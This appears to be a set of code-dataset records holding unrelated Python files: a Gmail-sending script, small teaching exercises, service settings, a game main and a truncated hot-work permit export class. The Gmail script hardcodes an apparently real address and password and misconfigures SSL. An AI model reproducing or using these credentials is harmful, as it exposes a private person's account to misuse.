encoders\nimport os\n\ngmail_user = \"myoung0710@gmail.com\" # gmail address\ngmail_pwd = \"sksajtwu123\" # gmail password\n\ndef send_gmail(to, subject, text):\n msg = MIMEMultipart()\n msg['From'] = gmail_user\n msg['To'] = to\n msg['Subject'] = subject\n msg.attach(MIMEText(text))\n part = MIMEBase('application', 'octet-stream')\n #part.set_payload(open(attach, 'rb').read())\n #encoders.encode_base64(part)\n #part.add_header('Content-Disposition', 'attachment; filename=\"%s\"' % os.path.basename(attach))\n msg.attach(part)\n mailServer = smtplib.SMTP_SSL(\"smtp.gmail.com\", 587)\n mailServer.ehlo()\n mailServer.starttls()\n mailServer.ehlo()\n mailServer.login(gmail_user, gmail_pwd)\n mailServer.sendmail(gmail_user, to, msg.as_string())\n mailServer.quit()\n\nsend_gmail(\"myoung0710@naver.com\", \"SendMail Test\", \"Send_gamil 함수 테스트입니다.\" )\n","sub_path":"SendMail.py","file_name":"SendMail.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"241980550","text":"\"\"\"def add(a, b):\r\n return a + b\r\nprint (add(1,2))\r\n\r\n# with Lambda\r\nadd = lambda x, y : x + y\r\n\r\nprint ( add(3,4))\r\n\"\"\"\r\n\r\nmy_list = [1,2,3,4,5,6,7]\r\n\r\nnew_list = list(map(lambda x : x * 2, my_list))\r\n\r\n\r\nprint (new_list)\r\n#combine first and last name to single \"full name\"\r\nfull_name = lambda fn, ln: fn.strip().title() + \" \" + ln.strip().title()\r\nfull_name(\"sasd\", \"shandj\")\r\nprint(str(full_name))\r\n\r\n\r\n","sub_path":"lambdafun.py","file_name":"lambdafun.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"598906563","text":"#Lee un número del teclado\n#Si es:\n#-par\n#-entre -10 y 40\n#-negativo\n#Nota: una sola condición\n\n#Juego de pruebas:\n#-30,-11,-10,-6,-5,0,6,40,41,234\n\n#coding:utf-8\nnum = int(input(\"Por favor introduzca un numero: \"))\nif num % 2 == 0 or (num >=-10 and num <= 40) or num < 0:\n print(\"Tu numero es par, esta entre -10 y 40 o es negativo\")\nelse:\n print(\"Lo siento tu numero no esta en la lista\")\n","sub_path":"Python/ejercicio-condicion-chunga.py","file_name":"ejercicio-condicion-chunga.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"139780386","text":"# (C) Copyright 2014 Voyager Search\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\n\n\n\"\"\"Settings for the nlp service.\"\"\"\nSERVICE_ADDRESS = 'localhost'\nSERVICE_PORT = 8081\n\nbase_path = os.path.dirname(__file__)\n\"\"\" Change this path to the location you would like the logs to be written to. \"\"\"\nLOG_FILE_PATH = os.path.join(base_path, 'logs')\nif not os.path.exists(LOG_FILE_PATH):\n os.makedirs(LOG_FILE_PATH)\n","sub_path":"pipeline/steps/voyager-nlp/nlp/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"491311897","text":"'''Rock paper scissors game :)'''\nfrom Computer import Computer;\nfrom Player import Player;\nfrom Decider import Decider;\n\n#Decides the winner\ndef main():\n player = Player.decide();\n computer = Computer.decide();\n print('The computer chose ', computer, '. You chose ', player, sep = '');\n decider = Decider(computerChoice = computer, playerChoice = player);\n decider.decide();\n \nprint('Welcome to Rock Paper Scissors!!');\nplayAgain = 'Y';\n\nwhile playAgain == 'Y':\n main();\n playAgain = input('Play again? Y/N\\n');","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"257324714","text":"from collections import OrderedDict\n\nfrom datetime_tz import datetime_tz\n\nfrom PTTGC.PermitToWork.DataSets.DataSetHelper import DataSetHelper\nfrom sjsoft.Apps.Reports import Export\n\n\nclass HotWorkDataSet(DataSetHelper):\n _PERMIT_HEADING_FIELDS_DATASET = 'permit_heading_fields'\n _PERMIT_DATETIME_FIELDS_DATASET = 'permit_datetime_fields'\n _PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET = 'permit_signature_and_name_fields'\n _OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET = 'other_relevant_documents_fields'\n _CERTIFICATE_FIELDS_DATASET = 'certificate_fields'\n _SAFETY_REQUIREMENTS_FIELDS_DATASET = 'safety_requirements_fields'\n _PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET = 'personal_protective_equipment_required_fields'\n _GAS_MEASUREMENT_RESULTS_FIELDS_DATASET = 'gas_measurement_results_fields'\n _APPROVAL_NON_FLAMABLE_FIELDS_DATASET = 'approval_non_flamable_fields'\n _APPROVAL_FLAMABLE_FIELDS_DATASET = 'approval_flamable_fields'\n _COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET = 'communicate_with_requestor_fields'\n _GAS_DETECTION_FIELDS_DATASET = 'gas_detection_fields'\n _WORK_PERMIT_RENEWAL_FIELDS_DATASET = 'work_permit_renewal_fields'\n _CLOSE_WORK_PERMIT_FIELDS_DATASET = 'close_work_permit_fields'\n\n _SECTION_1_TITLE = 'Contractors fill the information data and attach document for Work Permit' # job owner\n _SECTION_2_TITLE = 'Job Owner verify data from contractor' # job owner\n _SECTION_3_TITLE = 'Cosigner approval for Work Permit' # cosign\n _SECTION_4_TITLE = 'Permit Issuer preparation area' # Permit Issuer\n _SECTION_5_TITLE = 'Permit Issuer preparation area' # Permit Issuer\n _SECTION_6_TITLE = 'Work Permit Approval (Non-Open Flammable)' # Approve\n _SECTION_7_TITLE = 'Work Permit Approval (Open Flammable)' # Approve\n _SECTION_8_TITLE = 'Communicate with Requestor (Non-Open Flammable)' # Permit Issuer\n _SECTION_9_TITLE = 'Communicate with Requestor (Open Flammable)' # Permit Issuer\n _SECTION_10_TITLE = 'Gas test while working' # Permit Issuer\n _SECTION_11_TITLE = 'Renewal of Perrmit Request' # job owner\n _SECTION_12_TITLE = 'Renewal of Perrmit (Non-Open Flammable)' # cosign\n _SECTION_13_TITLE = 'Renewal of Perrmit (Open Flammable)' # Permit Issuer\n _SECTION_14_TITLE = 'Close Permit (Non-Open Flammable)' # Permit Issuer\n _SECTION_15_TITLE = 'Close Permit (Open Flammable)' # job owner\n\n def create_metadata(self):\n # Heading Dataset fields\n permit_heading_fields = [\n Export.FieldMetaData('moc_no', None, 'str', 'Text211'),\n Export.FieldMetaData('permit_no', None, 'str', 'PermitNumber'),\n Export.FieldMetaData('applicant_name', None, 'str', 'HWRU_Name'),\n Export.FieldMetaData('contractor_company', None, 'str', 'Text2'),\n Export.FieldMetaData('phone_number', None, 'str', 'HWRU_Tel'),\n Export.FieldMetaData('number_of_operators', None, 'int', 'Integer1'),\n Export.FieldMetaData('restricted_area', None, 'str', 'area1'),\n Export.FieldMetaData('control_area', None, 'str', 'Choice61'),\n Export.FieldMetaData('workplace', None, 'str', 'Text220'),\n Export.FieldMetaData('device_name', None, 'str', 'Text3'),\n Export.FieldMetaData('device_number', None, 'str', 'Text4'),\n Export.FieldMetaData('description', None, 'str', 'Text225'),\n Export.FieldMetaData('area_hierarchy', None, 'str', 'Choice65'),\n Export.FieldMetaData('job_owner_name', None, 'str', 'JON_Name'),\n ]\n\n # Datetime Dataset fields\n permit_datetime_fields = [\n Export.FieldMetaData('header_from_date', None, 'datetime', 'DateTimeStart'),\n Export.FieldMetaData('header_to_date', None, 'datetime', 'DateTimeEnd'),\n Export.FieldMetaData('header_job_owner_signed_date', None, 'datetime', 'Date3'),\n Export.FieldMetaData('gas_measurement_datetime', None, 'datetime', 'DateTime87'),\n Export.FieldMetaData('approval_non_flamable_datetime', None, 'datetime', 'DateTime88'),\n Export.FieldMetaData('approval_flamable_datetime', None, 'datetime', 'DateTime90'),\n Export.FieldMetaData('approval_cosign_datetime', None, 'datetime', 'DateTime91'),\n Export.FieldMetaData('requestor_non_flamable_datetime', None, 'datetime', 'DateTime101'),\n Export.FieldMetaData('requestor_flamable_datetime', None, 'datetime', 'DateTime102'),\n Export.FieldMetaData('gas_detection_reading1', None, 'datetime', 'DateTime79'),\n Export.FieldMetaData('gas_detection_reading2', None, 'datetime', 'DateTime100'),\n Export.FieldMetaData('gas_detection_reading3', None, 'datetime', 'DateTime100'),\n Export.FieldMetaData('wp_renew_non_flamable_datetime', None, 'datetime', 'DateTime35'),\n Export.FieldMetaData('wp_permit_non_flamable_approver_datetime', None, 'datetime', 'DateTime96'),\n Export.FieldMetaData('wp_renew_flamable_datetime', None, 'datetime', 'DateTime97'),\n Export.FieldMetaData('wp_permit_flamable_approver_datetime', None, 'datetime', 'DateTime98'),\n Export.FieldMetaData('close_restore_license_datetime_non_flamable', None, 'datetime', 'DateTime36'),\n Export.FieldMetaData('close_audit_accept_datetime_non_flamable', None, 'datetime', 'DateTime109'),\n Export.FieldMetaData('close_restore_license_datetime_flamable', None, 'datetime', 'DateTime94'),\n Export.FieldMetaData('close_audit_accept_datetime_flamable', None, 'datetime', 'DateTime108'),\n ]\n\n # # Datetime Dataset fields\n # permit_signature_and_name_fields = [\n # Export.FieldMetaData('approval_non_flamable_name_section_4_or_5', None, 'any', 'SubmitName_4_or_5'),\n # Export.FieldMetaData('approval_non_flamable_signature_section_4_or_5', None, 'any', 'SubmitSignature_4_or_5'),\n # Export.FieldMetaData('approval_non_flamable_name_section_6', None, 'any', 'SubmitName_6'),\n # Export.FieldMetaData('approval_non_flamable_signature_section_6', None, 'any', 'SubmitSignature_6'),\n # Export.FieldMetaData('wp_name_section_11_or_12', None, 'any', 'SubmitName_11_or_12'),\n # Export.FieldMetaData('wp_signature_section_11_or_12', None, 'any', 'SubmitSignature_11_or_12'),\n # ]\n\n permit_signature_and_name_fields = [\n Export.FieldMetaData('contractor_submit_name', None, 'str', 'section1_user'),\n Export.FieldMetaData('contractor_submit_datetime', None, 'datetime', 'section1_datetime'),\n Export.FieldMetaData('job_owner_submit_name', None, 'str', 'section2_user'),\n Export.FieldMetaData('job_owner_submit_datetime', None, 'datetime', 'section2_datetime'),\n Export.FieldMetaData('cosign_submit_name', None, 'str', 'section3_user'),\n Export.FieldMetaData('cosign_submit_datetime', None, 'datetime', 'section3_datetime'),\n Export.FieldMetaData('permit_issuer_verify_name', None, 'str', 'section4_user'),\n Export.FieldMetaData('permit_issuer_verify_datetime', None, 'datetime', 'section4_datetime'),\n Export.FieldMetaData('permit_issuer_submit_name', None, 'str', 'section5_user'),\n Export.FieldMetaData('permit_issuer_submit_datetime', None, 'datetime', 'section5_datetime'),\n\n Export.FieldMetaData('permit_approve_submit_name_non', None, 'str', 'section6_user'),\n Export.FieldMetaData('permit_approve_submit_datetime_non', None, 'datetime', 'section6_datetime'),\n Export.FieldMetaData('permit_approve_submit_name_open', None, 'str', 'section7_user'),\n Export.FieldMetaData('permit_approve_submit_datetime_open', None, 'datetime', 'section7_datetime'),\n\n Export.FieldMetaData('communicate_requestor_name_non', None, 'str', 'section8_user'),\n Export.FieldMetaData('communicate_requestor_datetime_non', None, 'datetime', 'section8_datetime'),\n Export.FieldMetaData('communicate_requestor_name_open', None, 'str', 'section9_user'),\n Export.FieldMetaData('communicate_requestor_datetime_open', None, 'datetime', 'section9_datetime'),\n\n Export.FieldMetaData('renewal_permit_request_name_non', None, 'str', 'section11_user'),\n Export.FieldMetaData('renewal_permit_request_non', None, 'datetime', 'section11_datetime'),\n Export.FieldMetaData('renewal_permit_request_name_open', None, 'str', 'section11_user'),\n Export.FieldMetaData('renewal_permit_request_open', None, 'datetime', 'section11_datetime'),\n\n Export.FieldMetaData('renewal_permit_submit_name_non', None, 'str', 'section12_user'),\n Export.FieldMetaData('renewal_permit_submit_datetime_non', None, 'datetime', 'section12_datetime'),\n Export.FieldMetaData('renewal_permit_submit_name_open', None, 'str', 'section13_user'),\n Export.FieldMetaData('renewal_permit_submit_datetime_open', None, 'datetime', 'section13_datetime'),\n\n Export.FieldMetaData('Close_Permit_submit_name_non', None, 'str', 'section14_user'),\n Export.FieldMetaData('Close_Permit_submit_datetime_non', None, 'datetime', 'section14_datetime'),\n Export.FieldMetaData('Close_Permit_submit_name_open', None, 'str', 'section15_user'),\n Export.FieldMetaData('Close_Permit_submit_datetime_open', None, 'datetime', 'section15_datetime')\n ]\n\n\n\n\n\n\n\n\n\n\n\n\n\n # Certificate Dataset fields\n certificate_fields = [\n Export.FieldMetaData('confined_space_certificate_no', None, 'str', 'confined_space_certificate_no'),\n Export.FieldMetaData('crane_lifting_certificate_no', None, 'str', 'crane_lifting_certificate_no'),\n Export.FieldMetaData('excavation_certificate_no', None, 'str', 'excavation_certificate_no'),\n Export.FieldMetaData('box_up_certificate_no', None, 'str', 'box_up_certificate_no'),\n Export.FieldMetaData('radiography_certificate_no', None, 'str', 'radiography_certificate_no'),\n Export.FieldMetaData('diving_certificate_no', None, 'str', 'diving_certificate_no'),\n Export.FieldMetaData('scaffolding_certificate_no', None, 'str', 'scaffolding_certificate_no'),\n Export.FieldMetaData('road_close_certificate_no', None, 'str', 'road_close_certificate_no'),\n Export.FieldMetaData('nearby_high_voltage_certificate_no', None, 'str', 'nearby_high_voltage_certificate_no')\n ]\n\n # other_relevant_documents Dataset fields\n other_relevant_documents_fields = [\n Export.FieldMetaData('jsea_safety_environment', None, 'str', 'Text230'),\n Export.FieldMetaData('p_id_route_attachment', None, 'str', 'Text221'),\n Export.FieldMetaData('p_id_route', None, 'str', 'Text221'),\n Export.FieldMetaData('safety_datasheet', None, 'str', 'Text16'),\n Export.FieldMetaData('safety_datasheet_attachment', None, 'str', 'Text16'),\n Export.FieldMetaData('other_title', None, 'str', 'Text236'),\n Export.FieldMetaData('job_description', None, 'str', 'Choice62'),\n Export.FieldMetaData('job_owner_integer41', None, 'int', 'Integer41'),\n Export.FieldMetaData('surname', None, 'str', 'Text204')\n ]\n\n # safety_requirements Dataset fields\n safety_requirements_fields = [\n Export.FieldMetaData('last_used_device_condition', None, 'str', 'Text22'),\n Export.FieldMetaData('device_paused_checklist', None, 'str', 'ChecklistItem125'),\n Export.FieldMetaData('device_cut_off_check', None, 'str', 'Checkbox17'),\n Export.FieldMetaData('device_cut_off_text', None, 'str', 'Text23'),\n Export.FieldMetaData('is_pressure_our_checklist', None, 'str', 'ChecklistItem126'),\n Export.FieldMetaData('attach_logic_control_diagram', None, 'str', 'Text24'),\n Export.FieldMetaData('liquid_is_released_checklist', None, 'str', 'ChecklistItem127'),\n Export.FieldMetaData('isolation_plan_check', None, 'str', 'Checkbox18'),\n Export.FieldMetaData('not_attached_logic_control_diagram', None, 'str', 'Text25'),\n Export.FieldMetaData('liquid_residues_checklistitem', None, 'str', 'ChecklistItem128'),\n Export.FieldMetaData('pressure_drop_checklistitem', None, 'str', 'ChecklistItem129'),\n Export.FieldMetaData('local_switch_check', None, 'str', 'Checkbox19'),\n Export.FieldMetaData('by_pass', None, 'str', 'Text26'),\n Export.FieldMetaData('pipe_has_been_cut_checklistitem', None, 'str', 'ChecklistItem130'),\n Export.FieldMetaData('breaker_check', None, 'str', 'Checkbox20'),\n Export.FieldMetaData('breaker', None, 'str', 'Text27'),\n Export.FieldMetaData('equipment_cleaned_checklistitem', None, 'str', 'ChecklistItem131'),\n Export.FieldMetaData('other_breaker', None, 'str', 'Text191'),\n Export.FieldMetaData('remove_pipe_joints_checklistitem', None, 'str', 'ChecklistItem132'),\n Export.FieldMetaData('cleaning_with_nitrogen_checklistitem', None, 'str', 'ChecklistItem133'),\n Export.FieldMetaData('attach_electric_plan_check', None, 'str', 'Checkbox21'),\n Export.FieldMetaData('steam_cleaning_checklistitem', None, 'str', 'ChecklistItem134'),\n Export.FieldMetaData('no_electricity_plan_check', None, 'str', 'Checkbox22'),\n Export.FieldMetaData('cleaning_the_water_checklistitem', None, 'str', 'ChecklistItem135'),\n Export.FieldMetaData('electrical_equipment_cut_checklistitem', None, 'str', 'ChecklistItem136'),\n Export.FieldMetaData('defeat_check', None, 'str', 'Checkbox23'),\n Export.FieldMetaData('defeat', None, 'str', 'Text30'),\n Export.FieldMetaData('other_defeat_checklistitem', None, 'str', 'ChecklistItem137'),\n Export.FieldMetaData('by_pass_check', None, 'str', 'Checkbox26'),\n Export.FieldMetaData('sparking_block_fireproof_cover', None, 'str', 'Text31'),\n Export.FieldMetaData('by_pass_description', None, 'str', 'Text192'),\n Export.FieldMetaData('attach_logic_control_diagram_check', None, 'str', 'Checkbox24'),\n Export.FieldMetaData('make_on_site_verifier_checklistitem', None, 'str', 'ChecklistItem138'),\n Export.FieldMetaData('not_attach_logic_control_diagram_check', None, 'str', 'Checkbox25'),\n Export.FieldMetaData('contact_on_site_verifier', None, 'str', 'Text222'),\n Export.FieldMetaData('recommended_actions', None, 'str', 'Text194'),\n Export.FieldMetaData('block_work_area_check', None, 'str', 'Checkbox27'),\n Export.FieldMetaData('personal_gas_meter_check', None, 'str', 'Checkbox36'),\n Export.FieldMetaData('personal_gas_meter', None, 'str', 'Text33'),\n Export.FieldMetaData('cover_drain_in_radius_check', None, 'str', 'Checkbox28'),\n Export.FieldMetaData('connect_spray_line_check', None, 'str', 'Checkbox37'),\n Export.FieldMetaData('prepare_ventilator_check', None, 'str', 'Checkbox29'),\n Export.FieldMetaData('warning_signs_check', None, 'str', 'Checkbox38'),\n Export.FieldMetaData('water_spray_baffle_check', None, 'str', 'Checkbox30'),\n Export.FieldMetaData('leaky_hydrocarbon_stop_working_check', None, 'str', 'Checkbox39'),\n Export.FieldMetaData('sparking_block_fireproof_cover_check', None, 'str', 'Checkbox31'),\n Export.FieldMetaData('do_not_release_liquid_check', None, 'str', 'Checkbox40'),\n Export.FieldMetaData('fire_extinguishers_in_work_area_check', None, 'str', 'Checkbox32'),\n Export.FieldMetaData('communicate_with_staff_check', None, 'str', 'Checkbox41'),\n Export.FieldMetaData('standby_fire_extinguisher_check', None, 'str', 'Checkbox33'),\n Export.FieldMetaData('destroy_pyrophoric_substances_check', None, 'str', 'Checkbox42'),\n Export.FieldMetaData('eye_washer_availability_check', None, 'str', 'Checkbox34'),\n Export.FieldMetaData('be_careful_side_effects_check', None, 'str', 'Checkbox43'),\n Export.FieldMetaData('drill_pipe_gas_detection_check', None, 'str', 'Checkbox35'),\n Export.FieldMetaData('other_safety_requirements_check', None, 'str', 'Checkbox44'),\n Export.FieldMetaData('other_safety_requirements', None, 'str', 'Text34'),\n Export.FieldMetaData('more_caution', None, 'str', 'Text196'),\n Export.FieldMetaData('text243', None, 'str', 'Text211')#text243\n ]\n\n # personal_protective_equipment_required Dataset fields\n personal_protective_equipment_required_fields = [\n Export.FieldMetaData('standard_ppe_check', None, 'str', 'Checkbox50'),\n Export.FieldMetaData('safety_glasses_check', None, 'str', 'Checkbox54'),\n Export.FieldMetaData('chemical_mask_check', None, 'str', 'Checkbox51'),\n Export.FieldMetaData('full_body_harness_check', None, 'str', 'Checkbox55'),\n Export.FieldMetaData('ear_plugs_check', None, 'str', 'Checkbox52'),\n Export.FieldMetaData('dust_prevention_kit_check', None, 'str', 'Checkbox56'),\n Export.FieldMetaData('glove_check', None, 'str', 'Checkbox53'),\n Export.FieldMetaData('chemical_protection_suit_check', None, 'str', 'Checkbox57'),\n Export.FieldMetaData('other_ppe_check', None, 'str', 'Checkbox58'),\n Export.FieldMetaData('other_ppe', None, 'str', 'Text41')\n ]\n\n # gas_measurement_results Dataset fields\n gas_measurement_results_fields = [\n Export.FieldMetaData('agt_choice', None, 'str', 'Choice57'),\n Export.FieldMetaData('lel_frequency', None, 'float', 'Number184'),\n Export.FieldMetaData('o2_frequency', None, 'float', 'Number185'),\n Export.FieldMetaData('h2o_frequency', None, 'float', 'Number186'),\n Export.FieldMetaData('co_frequency', None, 'float', 'Number187'),\n Export.FieldMetaData('other_frequency', None, 'float', 'Number188'),\n Export.FieldMetaData('lel_standard', None, 'float', 'Integer19'),\n Export.FieldMetaData('o2_standard', None, 'float', 'Integer20'),\n Export.FieldMetaData('h2o_standard', None, 'float', 'Integer21'),\n Export.FieldMetaData('co_standard', None, 'float', 'Integer22'),\n Export.FieldMetaData('other_standard', None, 'float', 'Integer23'),\n Export.FieldMetaData('gas_measurement_other', None, 'str', 'Text215'),\n Export.FieldMetaData('gas_measurement_na', None, 'str', 'Text203')\n ]\n\n # approval_non_flamable Dataset fields\n approval_non_flamable_fields = [\n Export.FieldMetaData('non_flamable_employee_number', None, 'int', 'Integer45'),\n Export.FieldMetaData('non_flamable_surname', None, 'str', 'Text209'),\n Export.FieldMetaData('non_flamable_validated_check', None, 'str', 'Checkbox65')\n ]\n\n # approval_flamable Dataset fields\n approval_flamable_fields = [\n Export.FieldMetaData('flamable_employee_number', None, 'int', 'Integer46'),\n Export.FieldMetaData('flamable_employee_surname', None, 'str', 'Text210'),\n Export.FieldMetaData('flamable_validated_check', None, 'str', 'Checkbox67'),\n Export.FieldMetaData('permit_requires_co_sign_checklistitem', None, 'str', 'ChecklistItem143'),\n Export.FieldMetaData('employee_coordinator_code', None, 'int', 'Integer42'),\n Export.FieldMetaData('employee_coordinator_surname', None, 'str', 'Text206'),\n Export.FieldMetaData('cosign_validated', None, 'str', 'Checkbox68')\n ]\n\n # communicate_with_requestor Dataset fields\n communicate_with_requestor_fields = [\n Export.FieldMetaData('requestor_non_flamable_check', None, 'str', 'Checkbox66'),\n Export.FieldMetaData('requesto_flamable_check', None, 'str', 'Checkbox69'),\n Export.FieldMetaData('requestor_supervisor_non_flamable', None, 'str', 'Text228'),\n Export.FieldMetaData('requestor_supervisor_flamable', None, 'str', 'Text238'),\n Export.FieldMetaData('requestor_verifier_non_flamable', None, 'str', 'Label748'),\n Export.FieldMetaData('requestor_verifier_flamable', None, 'str', 'Label768')\n ]\n\n # gas_detection Dataset fields\n gas_detection_fields = [\n Export.FieldMetaData('lel_reading1', None, 'float', 'Integer2'),\n Export.FieldMetaData('o2_reading1', None, 'float', 'Integer7'),\n Export.FieldMetaData('h2o_reading1', None, 'float', 'Integer17'),\n Export.FieldMetaData('co_reading1', None, 'float', 'Integer18'),\n Export.FieldMetaData('other_reading1', None, 'float', 'Integer28'),\n Export.FieldMetaData('agt_reading1', None, 'str', 'Text216'),\n Export.FieldMetaData('lel_reading2', None, 'float', 'Integer24'),\n Export.FieldMetaData('o2_reading2', None, 'float', 'Integer25'),\n Export.FieldMetaData('h2o_reading2', None, 'float', 'Integer26'),\n Export.FieldMetaData('co_reading2', None, 'float', 'Integer27'),\n Export.FieldMetaData('other_reading2', None, 'float', 'Integer29'),\n Export.FieldMetaData('agt_reading2', None, 'str', 'Text223'),\n Export.FieldMetaData('lel_reading3', None, 'float', 'Integer30'),\n Export.FieldMetaData('o2_reading3', None, 'float', 'Integer31'),\n Export.FieldMetaData('h2o_reading3', None, 'float', 'Integer32'),\n Export.FieldMetaData('co_reading3', None, 'float', 'Integer33'),\n Export.FieldMetaData('other_reading3', None, 'float', 'Integer34'),\n Export.FieldMetaData('agt_reading3', None, 'str', 'Text224')\n ]\n\n # work_permit_renewal Dataset fields\n work_permit_renewal_fields = [\n Export.FieldMetaData('renew_license', None, 'str', 'ChecklistItem140'),\n Export.FieldMetaData('renew_non_flamable_employee_number', None, 'int', 'Integer43'),\n Export.FieldMetaData('renew_non_flamable_surname', None, 'str', 'Text207'),\n Export.FieldMetaData('permit_non_flamable_approver_check', None, 'str', 'Checkbox74'),\n Export.FieldMetaData('renew_flamable_employee_number', None, 'int', 'Integer44'),\n Export.FieldMetaData('renew_flamable_surname', None, 'str', 'Text208'),\n Export.FieldMetaData('permit_flamable_approver_check', None, 'str', 'Checkbox75'),\n Export.FieldMetaData('supervisor_acknowledged_non_flamable', None, 'str', 'Text259'),\n Export.FieldMetaData('supervisor_acknowledged_flamable', None, 'str', 'Text241')\n ]\n\n # close_work_permit Dataset fields\n close_work_permit_fields = [\n Export.FieldMetaData('lock_removed_non_flamable_checklistitem', None, 'str', 'ChecklistItem141'),\n Export.FieldMetaData('lock_removed_not_reason_non_flamable', None, 'str', 'Text197'),\n Export.FieldMetaData('license_closing_non_flamable_check', None, 'str', 'Checkbox60'),\n Export.FieldMetaData('work_complete_non_flamable_check', None, 'str', 'Checkbox61'),\n Export.FieldMetaData('unfinished_work_reason_non_flamable', None, 'str', 'Text54'),\n Export.FieldMetaData('restore_license_supervisor_non_flamable', None, 'str', 'Text56'),\n Export.FieldMetaData('audit_accept_non_flamable_check', None, 'str', 'Checkbox62'),\n Export.FieldMetaData('audit_accept_no_reason_non_flamable_check', None, 'str', 'Checkbox63'),\n Export.FieldMetaData('audit_accept_no_reason_non_flamable', None, 'str', 'Text55'),\n Export.FieldMetaData('lock_removed_flamable_checklistitem', None, 'str', 'ChecklistItem142'),\n Export.FieldMetaData('lock_removed_not_reason_flamable', None, 'str', 'Text198'),\n Export.FieldMetaData('license_closing_flamable_check', None, 'str', 'Checkbox70'),\n Export.FieldMetaData('work_complete_flamable_check', None, 'str', 'Checkbox71'),\n Export.FieldMetaData('unfinished_work_reason_flamable', None, 'str', 'Text199'),\n Export.FieldMetaData('restore_license_supervisor_flamable', None, 'str', 'Text200'),\n Export.FieldMetaData('audit_accept_flamable_check', None, 'str', 'Checkbox76'),\n Export.FieldMetaData('audit_accept_no_reason_flamable_check', None, 'str', 'Checkbox77'),\n Export.FieldMetaData('audit_accept_no_reason_flamable', None, 'str', 'Text202'),\n Export.FieldMetaData('permit_issuer_non_flamable', None, 'str', 'Text258'),\n Export.FieldMetaData('permit_issuer_flamable', None, 'str', 'Text257')\n ]\n\n metadata = [Export.DataSetMetaData('permit_heading_fields.csv', self._PERMIT_HEADING_FIELDS_DATASET, permit_heading_fields)]\n metadata.extend([Export.DataSetMetaData('permit_datetime_fields.csv', self._PERMIT_DATETIME_FIELDS_DATASET, permit_datetime_fields)])\n metadata.extend([Export.DataSetMetaData('permit_signature_and_name_fields.csv', self._PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET, permit_signature_and_name_fields)])\n metadata.extend([Export.DataSetMetaData('certificate_fields.csv', self._CERTIFICATE_FIELDS_DATASET, certificate_fields)])\n metadata.extend([Export.DataSetMetaData('other_relevant_documents_fields.csv', self._OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET, other_relevant_documents_fields)])\n metadata.extend([Export.DataSetMetaData('safety_requirements_fields.csv',self._SAFETY_REQUIREMENTS_FIELDS_DATASET, safety_requirements_fields)])\n metadata.extend([Export.DataSetMetaData('personal_protective_equipment_required_fields.csv',self._PERSONAL_PROTECTIVE_EQUIPMENT_REQUIRED_FIELDS_DATASET, personal_protective_equipment_required_fields)])\n metadata.extend([Export.DataSetMetaData('gas_measurement_results_fields.csv', self._GAS_MEASUREMENT_RESULTS_FIELDS_DATASET, gas_measurement_results_fields)])\n metadata.extend([Export.DataSetMetaData('approval_non_flamable_fields.csv', self._APPROVAL_NON_FLAMABLE_FIELDS_DATASET, approval_non_flamable_fields)])\n metadata.extend([Export.DataSetMetaData('approval_flamable_fields.csv', self._APPROVAL_FLAMABLE_FIELDS_DATASET, approval_flamable_fields)])\n metadata.extend([Export.DataSetMetaData('communicate_with_requestor_fields.csv', self._COMMUNICATE_WITH_REQUESTOR_FIELDS_DATASET, communicate_with_requestor_fields)])\n metadata.extend([Export.DataSetMetaData('gas_detection_fields.csv', self._GAS_DETECTION_FIELDS_DATASET, gas_detection_fields)])\n metadata.extend([Export.DataSetMetaData('work_permit_renewal_fields.csv', self._WORK_PERMIT_RENEWAL_FIELDS_DATASET, work_permit_renewal_fields)])\n metadata.extend([Export.DataSetMetaData('close_work_permit_fields.csv', self._CLOSE_WORK_PERMIT_FIELDS_DATASET, close_work_permit_fields)])\n\n return metadata\n\n def generate_datasets(self, sa_session, params, locale, timezone):\n datasets = {}\n permit_logid = params.get('permit_logid')\n if permit_logid:\n snapshot = self.get_form_snapshot(sa_session, permit_logid)\n # permit_heading\n datasets[self._PERMIT_HEADING_FIELDS_DATASET] = self.get_permit_heading_fields_dataset(permit_logid, snapshot, self._PERMIT_HEADING_FIELDS_DATASET, sa_session)\n # permit_datetimes\n datasets[self._PERMIT_DATETIME_FIELDS_DATASET] = self.get_permit_datetime_fields_dataset(permit_logid, snapshot, self._PERMIT_DATETIME_FIELDS_DATASET, sa_session)\n # permit_signatures and names\n datasets[self._PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET] = self.get_permit_signature_and_name_fields_dataset(permit_logid, snapshot, self._PERMIT_SIGNATURE_AND_NAME_FIELDS_DATASET, sa_session)\n # certificate_fields\n datasets[self._CERTIFICATE_FIELDS_DATASET] = self.get_certificate_fields_dataset(permit_logid, snapshot, self._CERTIFICATE_FIELDS_DATASET, sa_session)\n # other_relevant_documents\n datasets[self._OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET] = self.get_other_relevant_documents_fields_dataset(permit_logid, snapshot, self._OTHER_RELEVANT_DOCUMENTS_FIELDS_DATASET, sa_session)\n # safety_requirements\n datasets[self._SAFETY_REQUIREMENTS_FIELDS_DATASET] = self.get_safety_requirements_fields_dataset(permit_logid, snapshot, self._SAFETY_REQUIREMENTS_FIELDS_DATASET, sa_session)\n # 